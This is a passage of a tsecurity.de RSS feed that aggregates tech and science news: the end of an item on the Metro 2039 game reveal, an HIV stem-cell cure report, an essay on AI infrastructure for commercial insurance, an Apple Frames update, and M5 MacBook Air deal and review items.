hallmark of the regime. </p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/m2039_revealscreenshot_06_metro_station_4k_9344.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/m2039_revealscreenshot_06_metro_station_4k_9344.jpg" alt="Screenshot from Metro 2039." data-uuid="64cea801-5cb8-49d1-b434-699fda6ef578"><figcaption>Screenshot from Metro 2039.</figcaption><div class="photo-credit">4A Games</div></figure><p>The Metro series is based on novels by Dmitry Glukhovsky, a Russian author who has been in exile due to his public denouncement of Russia’s invasion of Ukraine. 4A Studios says that while this new game isn’t based specifically on one of his works, they worked in collaboration with Glukhovsky on the story for <em>Metro 2039</em> “shaped by shared values of freedom and truth, and informed by the harsh realities of the world today.”</p><p>In statements from the studio, 4A directly acknowledges the conditions that <em>Metro 2039</em> was created under. “Many developers continue to work from multiple locations, facing daily challenges never anticipated,” the studio says. “Through power outages, reliance on generators, and disruptions from missile and drone attacks, development has continued – driven by resilience, shared support, and a commitment to the work.” </p><p>It goes on to state that: “The war has directly shaped the development of <em>Metro 2039</em>, with its story focused acutely on choices, actions, consequences, and the cost of securing a future. While told from a distinctly Ukrainian perspective, <em>Metro 2039</em> remains an authentic Metro story.” While the Metro series has been unfailingly bleak, it’s not hard to imagine how Russia’s invasion could have influenced the storytelling coming out of a Ukranian studio with an exiled Russian being part of the story team. But the limited bit of the game we’ve seen so far doesn’t make anything too explicit. </p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/m2039_revealscreenshot_02_tunnels_4k_9508.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/m2039_revealscreenshot_02_tunnels_4k_9508.jpg" alt="Screenshot from Metro 2039's reveal trailer." data-uuid="8e53f613-42b8-4ed1-b8ac-a3c1705de125"><figcaption>Screenshot from Metro 2039's reveal trailer.</figcaption><div class="photo-credit">4A Games</div></figure><p>The trailer shows off the new player-character known as The Stranger, the first voiced protagonist in the series (though we don’t hear him do anything but scream in the preview). The Stranger has apparently been surviving in the above-ground wasteland but is forced to return to the metro. The little bit of gameplay we saw was the standard first-person shooter view of The Stranger heading underground to be immediately ambushed by a pretty horrific monster that he barely escapes from — he’s then dragged to “safety” by a group of survivors who just get the doors to their shelter shut before being overrun by a larger horde. Creepy stuff.</p><p>The rest of the preview largely feels like a dream (or nightmare) sequence — but while it’s hard to put together what is going on, there’s no doubt that the detail in the environments and characters is top-notch. Given that the last metro game, <em>Metro Exodus</em>, was released way back in 2019, it’s fair to say that we’re getting a more graphically impressive rendering of ruined Moscow and the tunnels beneath it. </p><p>There’s no exact release date yet, but 4A Games says <em>Metro 2039</em> will arrive this winter for Xbox Series X/S, PlayStation 5 and PC. </p>This article originally appeared on Engadget at https://www.engadget.com/gaming/a-first-look-at-metro-2039-shows-how-its-ukrainian-developer-turned-the-darkness-up-to-11-171500713.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Norway Man Cured of HIV With Brother's Stem Cells]]></title>
<description><![CDATA[A 63-year-old man in Norway appears to be cured of HIV after receiving a stem cell transplant from his brother, who turned out to have a rare mutation that makes immune cells resistant to HIV. "Four years after the transplant, and two years after the man stopped antiretroviral therapy, he still a...]]></description>
<link>https://tsecurity.de/de/3435950/it-security-nachrichten/norway-man-cured-of-hiv-with-brothers-stem-cells/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435950/it-security-nachrichten/norway-man-cured-of-hiv-with-brothers-stem-cells/</guid>
<pubDate>Wed, 15 Apr 2026 17:09:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A 63-year-old man in Norway appears to be cured of HIV after receiving a stem cell transplant from his brother, who turned out to have a rare mutation that makes immune cells resistant to HIV. "Four years after the transplant, and two years after the man stopped antiretroviral therapy, he still appears to be free of the infection," reports Gizmodo. From the report: According to the report, the man was first diagnosed with myelodysplastic syndrome, a type of cancer that weakens blood cell production from bone marrow, in 2018. Though he seemed to initially respond to treatment, the cancer returned after two years, and doctors decided to perform a stem cell transplant. Because the man also had HIV (diagnosed in 2006), the doctors were hoping to treat both conditions at once, though they knew their chances were low. Most of these cases have involved the use of stem cells taken from people with two copies of a particular mutation in their CCR5 gene, which regulates the CC5R receptor on white blood cells. This mutation, named CCR5-delta 32, makes immune cells naturally resistant to infection from strains of HIV-1 (the most common type of the virus). However, only about 1% of the population carries two copies of the mutation.
 
After initial screening failed to find someone who both possessed the mutation and had compatible bone marrow, the doctors decided to move ahead with the man's brother, who was already known to have compatible bone marrow. But to everyone's surprise, testing on the day of the transplant showed that the brother also had the mutation. Though the man did experience some complications from the procedure, his body successfully started to produce new blood cells with the mutation. The doctors decided to take him off antiretroviral medication two years after the transplant. And in the two years since then, regular follow-up tests have failed to show any signs of the virus in his system. [...] According to AFP, there have only been roughly 10 cases worldwide involving an HIV cure through stem cell transplantation. This is the first to involve a family donor.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Norway+Man+Cured+of+HIV+With+Brother's+Stem+Cells%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F04%2F15%2F076216%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F04%2F15%2F076216%2Fnorway-man-cured-of-hiv-with-brothers-stem-cells%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/04/15/076216/norway-man-cured-of-hiv-with-brothers-stem-cells?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Architecting the AI backbone of intelligent insurance: How to engineer a scalable and performant enterprise AI platform]]></title>
<description><![CDATA[I spent years at Meta engineering large-scale systems for billions of users, delivering sub-second latency and five-nines (99.999%) uptime. When we started Outmarket AI, I brought that same lens: scalability, reliability, sustainability. Not buzzwords but real engineering.



Commercial insurance...]]></description>
<link>https://tsecurity.de/de/3432494/it-nachrichten/architecting-the-ai-backbone-of-intelligent-insurance-how-to-engineer-a-scalable-and-performant-enterprise-ai-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3432494/it-nachrichten/architecting-the-ai-backbone-of-intelligent-insurance-how-to-engineer-a-scalable-and-performant-enterprise-ai-platform/</guid>
<pubDate>Tue, 14 Apr 2026 17:17:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I spent years at Meta engineering large-scale systems for billions of users, delivering sub-second latency and five-nines (99.999%) uptime. When we started Outmarket AI, I brought that same lens: scalability, reliability, sustainability. Not buzzwords but real engineering.</p>



<p>Commercial insurance turned out to be a different planet. Some departments were still on pen and paper, going through manila folders. Others had systems built on COBOL, mainframes from the 80s to handle claims. Nobody wants to touch them because the guy who understood the code retired years ago and didn’t leave notes. Underwriters, brokers, marketing, customer reps — everyone going through thousand-page policy documents, making million-dollar calls for businesses. According to <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai" rel="nofollow">McKinsey’s State of AI research</a>, 78% of organizations are using AI in at least one business function. Insurance has been slower to change the way it operates day to day.</p>



<p>We started building AI products for a few lines of commercial business: workers’ comp, general liability and property coverage to better understand all the pain points. Consider workers’ compensation, which in itself is a beast. A human has to analyze injury claims, workplace risk factors, OSHA reports, medical records, claims histories and state regulations that differ wildly. For general liability, one has to dig through premises risk, operations exposure, vendor agreements and similar hassles for property coverages. Meaning a single policy decision might need someone to pull together dozens of documents from different sources and spend more time on clerical work as opposed to the real deal</p>



<p>Within weeks, our first client wanted it for every other line of business. Not just one department, but the entire organization. The pattern repeated with every new client as they quickly realized the same AI infrastructure could transform how they handled all of their commercial policies. That moment crystallized something for the founding team. We weren’t building a feature, but instead building an AI-backed infrastructure and I knew exactly what that meant from my time engineering at scale.</p>



<p>The AI part wasn’t what kept me up at night. Large language models (LLMs) can handle dense insurance documents. That’s been proven. What worried me was everything underneath.</p>



<p>First, scale. How do we build something that grows with more clients? And scale by users per client? What about seasonality when commercial insurance policy renewals peak? Q4 is a mess. Traffic doesn’t grow linearly. It spikes ~10x.</p>



<p>Second, reliability. We started with one LLM provider. It worked fine, but what will happen when traffic spikes? Everyone’s slamming the same LLM. That’s a nightmare of hitting rate limits, token limits. What if third-party systems go down? We all have seen this in action when ChatGPT went down</p>



<p>Third, data isolation. No insurer would tolerate its proprietary underwriting data bleeding into a competitor’s context window. Every client needs their own guardrails.</p>



<p>So we weren’t just building a system. We were building a beast that can’t flinch under pressure, can’t go dark when a provider fails and can’t leak data between clients.</p>



<p>We attacked each problem head-on.</p>



<p>For isolation, we went single-tenant. Every client gets their own instance, their own database, their own AI context boundary. No shortcuts.</p>



<p>For reliability, we designed the load balancers of AI agents that look at everything and most importantly, latency, cost, accuracy needs, provider health and make a call in real time. If one provider is down, it is now obvious that the traffic has to shift.</p>



<p>This orchestration layer was the breakthrough that can scale infinitely now.</p>



<h2 class="wp-block-heading">Why is insurance the ultimate stress test for AI infrastructure?</h2>



<p>Think about a mid-sized restaurant chain buying commercial insurance. They need workers’ comp for kitchen staff, general liability for slip-and-fall incidents, property coverage for equipment, outdoor dining coverage, liquor liability, theft protection. Probably a dozen policies total. And these are all thousands of pages of dense legal language, exclusions, endorsements, coverage schedules and many more.</p>



<p>Before AI, someone had to read all of this manually. Risk managers spent weeks on it, sometimes months, comparing quotes from various carriers, hunting for gaps, trying to catch redundancies and all of this manually. The mental load was brutal and mistakes were inevitable. I have seen claims denied because of a coverage gap buried on page 847 that no one saw. The policy looked fine. The exclusion that mattered was hiding in plain sight. When that happens, insurers fall back on their errors and omissions coverage (E&amp;O) to protect against mistakes made by their employees while reviewing insurance. That’s how broken the manual process is and can easily lead to millions of dollars in claims.</p>



<p>A typical policy bundle containing 2K pages can now be ingested in 10 to 15 seconds. Even though speed is a big win, what’s more exciting are things that were not possible before. Quotes from various carriers can now be compared side by side in real time. AI flagging gaps automatically before they turn into claim denial. Underwriters can type questions in plain English. “Does this cover water damage from a burst pipe in an unoccupied building during winter?” Answer with citations to gain more trust and confidence. No human can process with that speed and accuracy. The humans are now reviewers and decision-makers and not document processors.</p>



<h2 class="wp-block-heading"><a></a>Surviving seasonality: Engineering for 10x traffic spikes</h2>



<p>Insurance has a brutal seasonality problem. Policy renewals cluster around year-end. As soon as Q4 hits, traffic is expected to spike by ~10x. An architecture that runs fine in March can collapse in December if we haven’t planned for it.</p>



<p>Three things kept me up. First, caching. LLM caching is not like a typical web caching. Take these two questions, for example:</p>



<ol start="1" class="wp-block-list">
<li>“What’s my deductible for property damage?”</li>



<li>“How much do I pay out of pocket for building damage?”</li>
</ol>



<p>Both are basically the same question. How do we recognize that and not waste compute power?</p>



<p>Second, scaling. When renewal season hits, the largest client might need 10x the capacity overnight, but I don’t want to pay for that capacity year-round.</p>



<p>Third, routing. Not every query to LLM needs the biggest and the best model. A simple policy lookup doesn’t need the same horsepower as a complex one. Sending everything to one model means simple queries wait behind heavy ones.</p>



<p>We tackled each one.</p>



<p>For caching, we have semantic matching algorithms at multiple levels.</p>



<ol start="1" class="wp-block-list">
<li>At the embedding level: We cache vector representations so re-injection would re-use the same embeddings.</li>



<li>At the query level: We use <a href="https://en.wikipedia.org/wiki/Locality-sensitive_hashing" rel="nofollow">locality-sensitive hashing</a> to spot similar questions and serve cached responses. If a question is already answered, then a similar question can use the same response without burning the compute power twice.</li>
</ol>



<p>For scaling, each worker process can auto-scale horizontally based on queue length and current latency in-place. The largest client might go from 4 workers to 40, then scale back as soon as traffic drops. The key here is that scaling can be reactive, but for seasonalities, it can be predictive. If client X’s renewal rush started October 15th last year, then we can technically pre-warm their infrastructure on October 10th this year.</p>



<p>For routing, we built a classifier that examines incoming requests and sends them to the right model. A simple lookup can use a small, fast model; however, a complex coverage analysis workflow can be routed to more sophisticated models. This can cut cost by about 40% and actually improve P95 latency because simple queries are not jammed behind complex ones.</p>



<p>Now let’s put this together and we see users getting sub-second responses irrespective of quiet Tuesdays or chaotic Decembers. That consistency is what turns AI to what people can use at scale.</p>



<h2 class="wp-block-heading">AI hallucinations kill trust; domain knowledge fixes it</h2>



<p>Large Language Models (LLMs) fail in ways that regular software does not. In traditional software engineering, a database either returns the right row or throws an error, but an LLM will always return plausible-sounding nonsense and any system will happily pass it downstream unless we build detection mechanisms. Research published in<a href="https://www.nature.com/articles/s41586-024-07421-0" rel="nofollow"> Nature</a> has shown that detecting these “confabulations” (arbitrary and incorrect generations) requires measuring uncertainty about the meanings of responses, not the text alone.</p>



<p>The root cause depends on how all these models learn. General-purpose LLMs train on public data crawled from the internet. They’re capable of broad reasoning without any domain expertise. If we ask a general LLM about insurance policy structure, it will give a reasonable-sounding answer drawn from insurance data that exists in its training set, which may or may not reflect the actual terminology, coverage structures and regulatory requirements that clients operate on. In any insurance, a reasonable-sounding yet wrong answer can lead to denial of claims or even regulatory violations, leading to millions of dollars in losses</p>



<p>Research on<a href="https://arxiv.org/abs/2402.06764" rel="nofollow"> fine-tuning LLMs for domain knowledge graph alignment</a> has demonstrated that when models are tuned to domain knowledge, then it can perform multi-step inferences while minimizing hallucination. So we built out our own knowledge graph for insurance, which holds definitions of how the industry actually works. Coverage types, policy structures, regulations, carrier-specific terms, claims workflows, how everything connects. It took years of domain expertise to build it and we are still fine-tuning it every time we run into a weird edge case. What we found out was that when our models were fine-tuned against this custom graph, they stayed inside verified boundaries instead of inventing plausible-sounding answers from pre-trained public data.</p>



<p>In practice, this makes a huge difference. If a user asks for coverage exclusions, then the system no longer hallucinates. It uses a knowledge graph as a source of truth. Any missing knowledge in the graph means uncertainty rather than confabulating an answer.</p>



<p>No system is perfect, though. Even with the knowledge graph, things slip through. I call it hallucination tripwires, an automated check that can catch AI when it’s making stuff up.</p>



<p>Model claims a coverage limit that’s nowhere in the source document? Tripwire.</p>



<p>Model references a policy section that doesn’t exist? Tripwire.</p>



<p>Model pulls a number that’s way outside expected ranges for that policy type? Tripwire.</p>



<p>An<a href="https://dl.acm.org/doi/10.1145/3703155" rel="nofollow"> ACM survey on LLM hallucinations</a> categorizes hallucination detection techniques into two: factuality and faithfulness approaches. When a tripwire triggers, a smart system won’t just log an error and move on. It will fall back to a secondary model for verification purposes. And when that fails, it will escalate to a human for review, depending upon the severity and confidence scores.</p>



<p>Hallucination detection is one piece. The other is model drift. Models can get worse over time and shift away from training data and accuracy drops. We track this constantly, checking against human-verified samples. When we see the numbers trending down, we fine-tune or adjust our prompts. Observability isn’t a nice-to-have; it’s a must for enterprise applications to stay reliable and win clients’ trust.</p>



<p>Databricks popularized a concept called <a href="https://www.databricks.com/glossary/medallion-architecture" rel="nofollow">medallion architecture</a>, where raw ingestion produces what we call “bronze” data, minimally processed, potentially messy. AI-driven normalization transforms this into “silver” data with consistent schemas and validated fields. Further enrichment and cross-referencing produce “gold” data that’s ready for downstream analytics and reporting. This tiering can help serve different use cases appropriately. Real-time policy queries can work against silver data, whereas regulatory reporting and actuarial analysis must work off of gold-tier data with full audit trails.</p>



<h2 class="wp-block-heading">Engineering principles that made the difference</h2>



<p>A few principles that stand out when I look back in time.</p>



<p>AI is an infrastructure. Treat it that way from day one. Don’t bolt on scalability later. The early decisions on single-tenant v/s multi-tenant, sync or async, one LLM provider or several will compound. Unwinding them later will be painful and expensive as it may eat up a good amount of engineering resources and time and even get new features to stand still for weeks to months.</p>



<p>Build for failures. Providers go down, models hallucinate and demands can go up at any time, especially when we least expect it, so build the fallback paths before entering panic mode.</p>



<p>Observability is not optional. In regular early-stage software, we can skip the fancy monitoring, but in later stages, especially with AI systems, we can not afford to do that. No observability will mean shipping a broken output and being blindfolded about it.</p>



<p>Commercial Insurance has built its traditional processes around human limits, especially reviewing speed and mental bandwidth. AI can lift those limits up if and only if the infrastructure holds up to its expectations reliably, at scale and under pressure.</p>



<p>The difference between an AI demo and an enterprise AI system is not the AI models but the backbone, the infrastructure that doesn’t flinch.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Frames 4 Adds New Colors and a Handy Tool for Developers]]></title>
<description><![CDATA[MacStories just released a massive update to its wildly popular screenshot tool. Apple Frames 4 is now available for users globally, bringing several highly requested features to the shortcut. The tool lets anyone easily wrap device frames around standard screenshots. This new version completely ...]]></description>
<link>https://tsecurity.de/de/3429835/ios-mac-os/apple-frames-4-adds-new-colors-and-a-handy-tool-for-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3429835/ios-mac-os/apple-frames-4-adds-new-colors-and-a-handy-tool-for-developers/</guid>
<pubDate>Mon, 13 Apr 2026 19:54:26 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MacStories just released a massive update to its wildly popular screenshot tool. Apple Frames 4 is now available for users globally, bringing several highly requested features to the shortcut. The tool lets anyone easily wrap device frames around standard screenshots. This new version completely rebuilds how the shortcut operates, making it faster and much more reliable for editing images on your phone or computer.



The update adds new frame colors and smarter proportional scaling



For the first time, people around the world can choose different colors for their device frames. If you take a screenshot on a midnight MacBook Air, you can now wrap that specific image in a matching dark frame. The major update also introduces a clever feature called proportional scaling. 



This means if you combine multiple screenshots of different devices into one picture, the shortcut automatically resizes them so they look correct next to each other. A small phone will actually look like a real phone sitting next to a large tablet, rather than awkwardly scaling up to the exact same height.



A brand new command-line tool helps developers work faster



The company also created something entirely new for advanced users. MacStories officially launched the Apple Frames CLI, which is a custom command line interface designed specifically for developers. This lets people run the framing tool directly from the terminal on a Mac computer.



It completely strips away the visual menus and just processes the images quietly in the background. Developers building apps or writing software articles can easily batch process hundreds of screenshots in a matter of seconds.



These smart improvements make the popular shortcut much more powerful for everyday tasks and professional work. Users globally will appreciate the added color options and the impressive speed of the new developer tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zombie-Horror aus Südkorea: Der neue Film vom Train-to-Busan-Regisseur]]></title>
<description><![CDATA[Yeon Sang-ho kehrt mit Colony zum Zombie-Genre zurück. Der Film läuft erstmals bei den Midnight Screenings in Cannes. (Zombie, Virus)]]></description>
<link>https://tsecurity.de/de/3427991/it-nachrichten/zombie-horror-aus-suedkorea-der-neue-film-vom-train-to-busan-regisseur/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3427991/it-nachrichten/zombie-horror-aus-suedkorea-der-neue-film-vom-train-to-busan-regisseur/</guid>
<pubDate>Mon, 13 Apr 2026 09:31:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Yeon Sang-ho kehrt mit Colony zum Zombie-Genre zurück. Der Film läuft erstmals bei den Midnight Screenings in Cannes. (<a href="https://www.golem.de/specials/zombie/">Zombie</a>, <a href="https://www.golem.de/specials/virus/">Virus</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=207486&amp;page=1&amp;ts=1776065102" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Grab Apple's M5 MacBook Air for $949 this weekend, record low price]]></title>
<description><![CDATA[Thanks to a $150 discount, shoppers can grab Apple's 2026 M5 MacBook Air 13-inch for a record low $949.Get the lowest 13-inch MacBook Air price this weekend at Amazon - Image credit: AppleThe 13-inch MacBook Air (2026) is now equipped with Apple's M5 chip that features a 10-core CPU with 4 super ...]]></description>
<link>https://tsecurity.de/de/3424283/ios-mac-os/grab-apples-m5-macbook-air-for-949-this-weekend-record-low-price/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3424283/ios-mac-os/grab-apples-m5-macbook-air-for-949-this-weekend-record-low-price/</guid>
<pubDate>Fri, 10 Apr 2026 18:38:16 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thanks to a $150 discount, shoppers can grab Apple's 2026 M5 MacBook Air 13-inch for a record low $949.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67314-141642-m5-macbook-air-949-deal-xl.jpg" alt="Open Midnight MacBook Air 13-inch laptop with blue abstract wallpaper on screen, large white text reading M5 AIR $949 over a bright pink, yellow, and teal gradient background."><br><span>Get the lowest 13-inch MacBook Air price this weekend at Amazon - Image credit: Apple</span></div><br>The 13-inch MacBook Air (2026) is now equipped with Apple's M5 chip that features a 10-core CPU with 4 super cores and 6 efficiency cores. This allows a performance boost over the M4 model. In the standard spec, which is <strong><a href="https://www.amazon.com/dp/B0GR1JTFP8/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">on sale for $949</a></strong> at Amazon this weekend, you'll also get an 8-core GPU, 16GB of unified memory, and 512GB of storage.<br><br><a href="https://amazon.com/dp/B0GR1493ZV/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" class="deal-highlight">Get 13" MacBook Air M5 from $949</a><br><br><br> <a href="https://appleinsider.com/articles/26/04/10/grab-apples-m5-macbook-air-for-949-this-weekend-record-low-price?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244004?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new M5-based MacBook Air is built to last — and perform]]></title>
<description><![CDATA[With its powerful M5 chip, the latest iteration of the world’s most popular laptop keeps everything that made the MacBook Air compelling in the first place, while meaningfully boosting performance across the board. Beyond the faster processor, there’s also much quicker SSD storage and better memo...]]></description>
<link>https://tsecurity.de/de/3421118/it-nachrichten/the-new-m5-based-macbook-air-is-built-to-last-and-perform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3421118/it-nachrichten/the-new-m5-based-macbook-air-is-built-to-last-and-perform/</guid>
<pubDate>Thu, 09 Apr 2026 18:16:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With its <a href="https://www.computerworld.com/article/4139969/apple-unveils-its-next-gen-m5-family-of-mac-laptops.html">powerful M5 chip</a>, the latest iteration of the world’s most popular laptop keeps everything that made the <a href="https://www.computerworld.com/article/4139969/apple-unveils-its-next-gen-m5-family-of-mac-laptops.html">MacBook Air</a> compelling in the first place, while meaningfully boosting performance across the board. Beyond the faster processor, there’s also much quicker SSD storage and better memory bandwidth, all of which combine to make  this a highly capable Mac.</p>



<p>In practical terms, the powerful M5 chip allows these Macs to better handle demanding data workloads than earlier models, making it an ideal machine for many creative and professional users. You also get 512GB of storage as standard (with as much as 4TB available as an option) and at least 16GB of RAM.</p>



<h2 class="wp-block-heading"><strong>Big improvements to Apple’s most popular laptop</strong></h2>



<p>To some extent, of course, the MacBook Air has been left in the shadows by the all-new MacBook Neo. The latter costs much less, is quite capable of handling most tasks, and is a great fit for general purpose use, though the M5 Air can do all of that faster, because it is built to be a more efficient machine. Compared to the M4-powered model you can see these improvements:</p>



<ul class="wp-block-list">
<li>With 10CPU cores and either 8 or 10 GPU cores, the M5 chip has a 15% faster CPU and 30% faster GPU.</li>



<li>It also has neural accelerators in each core, which makes the M5 MacBook Air very capable for AI-specific tasks or 3D rendering.</li>



<li>The memory bandwidth hits 153GBps. (The M4 model gave us 120GBps.)</li>



<li>SSD read/write speed are up to twice as fast as the M4, which you’ll feel when doing things with big files, such as when flinging video or imaging assets through apps or working/developing with on-device AI models.</li>
</ul>



<p>The price has increased by $100 to start at $1,099, though you get twice the built-in storage to help soften the blow.</p>



<h2 class="wp-block-heading"><strong>Benchmark performance</strong></h2>



<p>Let’s look at some of the benchmark scores I saw using Geekbench 6 with the Apple-loaned 15.3-in. MacBook Air I tested:</p>



<ul class="wp-block-list">
<li>Single-core: 4,103.</li>



<li>Multi-core: 17,089.</li>
</ul>



<p>For comparison, here are benchmarks for the previous generations:</p>



<ul class="wp-block-list">
<li>M1 MacBook Air: 2,346 single-core; 8,356 multi-core.</li>



<li>M2 MacBook Air: 2,588 single-core; 9,691, multi-core. </li>



<li>M3 MacBook Air: 3,065 single-core; 11,959 multi-core.</li>



<li>M4 MacBook Air: 3,833 single-core; 14,871 multi-core. </li>



<li>M5 MacBook Air: 4,103 single-core; 17,098 multi-core.</li>



<li>MacBook Neo: 3,608 single-core; 9,346 multi-core.</li>
</ul>



<p>Illustrating the extent to which the <a href="https://www.computerworld.com/article/4065553/apple-is-nowhere-near-the-limits-of-apple-silicon.html">move to Apple Silicon</a> has opened up new opportunities for Macs, the M5 MacBook Air delivers the kind of performance we once got from <a href="https://www.computerworld.com/article/1638478/apple-paints-it-black-with-its-efficient-high-performance-m3-range.html">M3 Pro/Max MacBook Pros that shipped just over two years ago</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/04/Apple-MacBook-Air-ports-260303.jpg?quality=50&amp;strip=all&amp;w=1024" alt="MacBook Air Ports " class="wp-image-4156725" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><a href="http://www.apple.com/" target="_blank" class="imageCredit" rel="noopener">Apple</a></div>



<h2 class="wp-block-heading"><strong>The bigger picture</strong></h2>



<p>To some extent, what’s coming next doesn’t mean much when planning what to get today, but the takeaway must be that MacBook Air has plenty of power under its hood for the future.  When you choose one, you aren’t just getting the processor — you’re also getting a range of other internal improvements designed to optimize the benefits it brings.</p>



<p>These improvements must certainly have been the North Star to engineers when they built this Mac, which also benefits from those new neural accelerators across all its cores. Even compared to the year-old M4 MacBook Air, these systems represent a big upgrade. </p>



<p>Of course, when you grab a laptop, the big thing you need is battery life. While your results will vary, the promised 18 hours of use on battery will get you through your day, every day. So will the display, which in this case is a 15.3-in. Liquid Retina P3 display with support for 1 billion colors, True Tone, and 500 nits of brightness. </p>



<p>When it comes to audio output and the built-in web conferencing cameras in these Macs, nothing much has changed fromlast year’s M4 models. The song remains the same when it comes to design: you get that beautiful aluminum chassis, new colors (Sky Blue, Midnight, Starlight, and Silver), with pretty much everything we already love about these Macs the same. Connectivity relies on an Apple N1 wireless chip for Wi-Fi 7 and Bluetooth 6. You also get two USB-C/Thunderbolt ports, MagSafe charging and the ability of driving up to two external displays in addition to that Liquid retina screen. That’s very useful for on-the-go pros who want to use a larger display most of the time but need the convenience of a portable now and then. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/04/Apple-MacBook-Air-hero-260303.jpg?quality=50&amp;strip=all&amp;w=1024" alt="MacBook Air with M5 chip" class="wp-image-4156726" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><a href="http://www.apple.com/" target="_blank" class="imageCredit" rel="noopener">Apple</a></div>



<h2 class="wp-block-heading"><strong>What about MacBook Neo?</strong></h2>



<p>Some feel the arrival of the MacBook Neo will cannibalize MacBook Air sales. There’s some truth in that. And while the Neo can and will handle almost anything a regular user might want to throw at it, the M5 Air is much more capable by design. While the Neo has a 6-core CPU, the Air has up to 10; the Neo gets 5 GPU cores, the Air gets 10; Neo has a maximum 8GB memory, while the Air ships with at least 16GB — and the memory interconnect is much faster too. It means these systems are great for anyone who wants to accomplish more demanding tasks, but can’t quite justify purchasing a MacBook Pro. </p>



<p>No doubt, most people will be happy with any one of these Macs most of the time. But when you need to hit a deadline or regularly tackle more demanding tasks, you’ll probably lean toward the Air, or something better. Most business users will do just that, even though more companies will be eyeing Macs thanks to the affordable Neo, which will be suitable for a whole collection of new use cases that couldn’t justify investment in Air.</p>



<h2 class="wp-block-heading"><strong>Buying advice</strong></h2>



<p>In reviewing Apple’s latest trio of Macs, I must confess — like <a href="https://www.applemust.com/macbook-neo-huge-success-but-can-apple-meet-demand/" target="_blank" rel="noreferrer noopener">so many people</a> — that I really have <a href="https://www.computerworld.com/article/4145811/review-a-weekend-with-macbook-neo.html">lost a little bit of my heart to the MacBook Neo</a>. But I do need a bit more power for what I do. That work doesn’t involve data-wrangling, video compositing, AI model design or any high-end graphics work, so while I might <em>want</em> a MacBook Pro, I really only <em>need</em> a MacBook Air. And this iteration offers all the power and performance I’d expect from a Mac I expect to use it for the next few years. </p>



<p>It’s a solid improvement to the most popular consumer notebook on the planet, remains a viable upgrade for MacBook Neo users and continues to serve as an alluring gateway to inch us toward the MacBook Pro. </p>



<p><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, and <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor X5d Plus and Honor X5d Launched With 5,260mAh Battery, MediaTek Helio G81 Chip: Price, Specifications]]></title>
